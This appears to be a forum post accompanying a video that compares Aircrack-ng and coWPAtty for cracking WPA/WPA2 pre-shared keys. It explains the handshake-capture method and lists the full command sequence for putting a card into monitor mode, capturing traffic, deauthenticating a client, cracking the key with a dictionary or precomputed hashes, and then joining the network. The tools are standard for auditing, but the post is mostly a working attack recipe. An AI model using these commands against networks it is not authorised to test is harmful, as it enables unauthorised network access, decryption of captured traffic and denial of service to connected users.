[Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

[g0tmi1k]

Links
Watch videoon-line: http://g0tmi1k.blip.tv/file/3356785
Download video: http://www.mediafire.com/?9dkjbygu238p2uj


What is this?
Comparing Aircrack-ng versus coWPAtty, in the time it takes to crack a WPA2 PSK key.
It shows 4 different cracks, the time taken and speed of the crack (see results).
> Aircrack-ng (Dictionary)
> Aircrack-ng & airolib-ng (Pre-computed hashes)
> coWPAtty (Dictionary)
> coWPAtty & Genpmk (Pre-computed hashes)


How does this work?
To crack WPA/WPA2 PSK you need to capture a ‘Handshake’ . The best way to this packet the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the user).

Once the key packet has been captured, it is time to start an offline dictionary attack. If the network key is in the dictionary, its just a question of waiting to process the dictionary file.

From here, the attacker can use that key to decrypt the captured data from before, and now is able to ‘read’ it as well as join the network.

If there isn't a connected client - you cant do this. If the network key isnt in the dictionary file - you cant do this.

You can speed the the cracking process by creating pre-calculated hash files (see results - for how much faster!)

Results
*For the table see blog*

What do I need?
> Aircrack-ng suite
> WiFi card that supports monitor mode
> Big dictionary
> Processing power


Software
Name: Aircrack-ng
Version: 1.0-rc3
Home Page: http://www.aircrack-ng.org/doku.php
Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gz

Name: coWPAtty
Version: 4.3
Home Page: http://www.willhackforsushi.com/Cowpatty.html
Download Link: http://www.willhackforsushi.com/code/cowpatty/4.3/cowpatty-4.3.tgz

Commands:

Code:

airmon-ng start wlan0
airodump-ng mon0

airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0

aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt



airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
airolib-ng crackwpa --import essid essid
airolib-ng crackwpa --stats
airolib-ng crackwpa --clean all
airolib-ng crackwpa --batch
airolib-ng crackwpa --verify all
aircrack -r crackwpa output-01.cap



cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt



genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash



wpa_passphrase g0tmi1k precivilization > wpa.conf
wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
dhclient -r
dhclient wlan0
ping 192.168.1.1

Notes:
Song: First Sate - Off the Radar (First State's 808 Clash Mix)
Video length: 08:38
Capture length: 01:14:29


Blog Post: http://g0tmi1k.blogspot.com/2010/02/...rcrack-ng.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/2394-%5Bvideo%5D-cracking-wifi-wpa-wpa2-aircrack-ng-vs-cowpatty.html